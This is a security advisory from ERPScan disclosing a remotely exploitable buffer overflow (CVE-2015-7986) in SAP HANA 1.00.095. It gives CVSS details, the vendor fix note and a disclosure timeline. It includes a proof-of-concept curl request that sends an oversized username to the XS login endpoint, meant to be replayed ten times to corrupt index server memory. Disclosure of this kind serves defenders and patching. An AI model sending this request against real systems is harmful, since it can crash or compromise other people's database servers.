159 lines
No EOL
6.3 KiB
Text
159 lines
No EOL
6.3 KiB
Text
[ERPSCAN-15-024] SAP HANA hdbindexserver - Memory corruption
|
||
|
||
Application: SAP HANA
|
||
Versions Affected: SAP HANA 1.00.095
|
||
Vendor URL: http://SAP.com
|
||
Bugs: Memory corruption, RCE
|
||
Reported: 17.07.2015
|
||
Vendor response: 18.07.2015
|
||
Date of Public Advisory: 13.10.2015
|
||
Reference: SAP Security Note 2197428
|
||
Author: Mathieu Geli (ERPScan)
|
||
|
||
|
||
Description
|
||
|
||
|
||
1. ADVISORY INFORMATION
|
||
|
||
Title: SAP HANA 1.00.095
|
||
Advisory ID: [ERPSCAN-15-024]
|
||
Risk: Hight
|
||
Advisory URL: http://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/
|
||
Date published: 13.10.2015
|
||
Vendors contacted: SAP
|
||
|
||
2. VULNERABILITY INFORMATION
|
||
|
||
Class: Memory corruption, RCE
|
||
Impact: full system compromise
|
||
Remotely Exploitable: Yes
|
||
Locally Exploitable: No
|
||
CVE Name: CVE-2015-7986
|
||
CVSS Information
|
||
CVSS Base Score: 9.3 / 10
|
||
CVSS Base Vector:
|
||
AV : Access Vector (Related exploit range)
|
||
Network (N)
|
||
AC : Access Complexity (Required attack complexity) Medium (M)
|
||
Au : Authentication (Level of authentication needed to exploit) None (N)
|
||
C : Impact to Confidentiality
|
||
Complete (C)
|
||
I : Impact to Integrity
|
||
Complete (C)
|
||
A : Impact to Availability
|
||
Complete (C)
|
||
|
||
3. VULNERABILITY DESCRIPTION
|
||
|
||
A buffer overflow vulnerability exists in SAP HANA interface. If an
|
||
attacker has a network access to the SQL interface or the SAP HANA
|
||
Extended Application Services interface of an SAP HANA system, the
|
||
vulnerability enables the attacker to inject code into the working
|
||
memory that is subsequently executed by the application. It can also
|
||
be used to cause a general fault in the product causing the product to
|
||
terminate.
|
||
|
||
Proof of concept
|
||
|
||
This authentication request should be replayed 10 times.
|
||
|
||
curl -v -XPOST http://hana:8000/sap/hana/xs/formLogin/login.xscfunc -H
|
||
'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H
|
||
'X-csrf-token: unsafe' -d
|
||
'xs-username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
|
||
|
||
|
||
|
||
4. VULNERABLE PACKAGES
|
||
|
||
SAP HANA 1.00.095.00
|
||
Other versions are probably affected too, but they were not checked.
|
||
|
||
|
||
5. SOLUTIONS AND WORKAROUNDS
|
||
|
||
To correct this vulnerability, install SAP Security Note 2197428
|
||
|
||
|
||
6. AUTHOR
|
||
|
||
Mathieu Geli (ERPScan)
|
||
|
||
|
||
7. TECHNICAL DESCRIPTION
|
||
|
||
An anonymous attacker can use a special HTTP request to corrupt SAP
|
||
HANA index server memory.
|
||
|
||
|
||
8. REPORT TIMELINE
|
||
|
||
Send: 17.07.2015
|
||
Reported: 17.07.2015
|
||
Vendor response: 18.07.2015
|
||
Date of Public Advisory: 13.10.2015
|
||
|
||
|
||
9. REFERENCES
|
||
|
||
http://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/
|
||
|
||
|
||
10. ABOUT ERPScan Research
|
||
|
||
The company’s expertise is based on the research subdivision of
|
||
ERPScan, which is engaged in vulnerability research and analysis of
|
||
critical enterprise applications. It has achieved multiple
|
||
acknowledgments from the largest software vendors like SAP, Oracle,
|
||
Microsoft, IBM, VMware, HP for discovering more than 400
|
||
vulnerabilities in their solutions (200 of them just in SAP!).
|
||
ERPScan researchers are proud to have exposed new types of
|
||
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be
|
||
nominated for the best server-side vulnerability at BlackHat 2013.
|
||
ERPScan experts have been invited to speak, present, and train at 60+
|
||
prime international security conferences in 25+ countries across the
|
||
continents. These include BlackHat, RSA, HITB, and private SAP
|
||
trainings in several Fortune 2000 companies.
|
||
ERPScan researchers lead the project EAS-SEC, which is focused on
|
||
enterprise application security research and awareness. They have
|
||
published 3 exhaustive annual award-winning surveys about SAP
|
||
security.
|
||
ERPScan experts have been interviewed by leading media resources and
|
||
featured in specialized info-sec publications worldwide. These include
|
||
Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,
|
||
Heise, and Chinabyte, to name a few.
|
||
We have highly qualified experts in staff with experience in many
|
||
different fields of security, from web applications and
|
||
mobile/embedded to reverse engineering and ICS/SCADA systems,
|
||
accumulating their experience to conduct the best SAP security
|
||
research.
|
||
|
||
|
||
11. ABOUT ERPScan
|
||
ERPScan is the most respected and credible Business Application
|
||
Security provider. Founded in 2010, the company operates globally and
|
||
enables large Oil and Gas, Financial and Retail organizations to
|
||
secure their mission-critical processes. Named as an ‘Emerging Vendor’
|
||
in Security by CRN, listed among “TOP 100 SAP Solution providers” and
|
||
distinguished by 30+ other awards, ERPScan is the leading SAP SE
|
||
partner in discovering and resolving security vulnerabilities. ERPScan
|
||
consultants work with SAP SE in Walldorf to assist in improving the
|
||
security of their latest solutions.
|
||
ERPScan’s primary mission is to close the gap between technical and
|
||
business security, and provide solutions to evaluate and secure SAP
|
||
and Oracle ERP systems and business-critical applications from both,
|
||
cyber-attacks as well as internal fraud. Usually our clients are large
|
||
enterprises, Fortune 2000 companies and managed service providers
|
||
whose requirements are to actively monitor and manage security of vast
|
||
SAP landscapes on a global scale.
|
||
We ‘follow the sun’ and function in two hubs, located in the Palo Alto
|
||
and Amsterdam to provide threat intelligence services, agile support
|
||
and operate local offices and partner network spanning 20+ countries
|
||
around the globe.
|
||
|
||
|
||
Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
|
||
Phone: 650.798.5255
|
||
Twitter: @erpscan
|
||
Scoop-it: Business Application Security |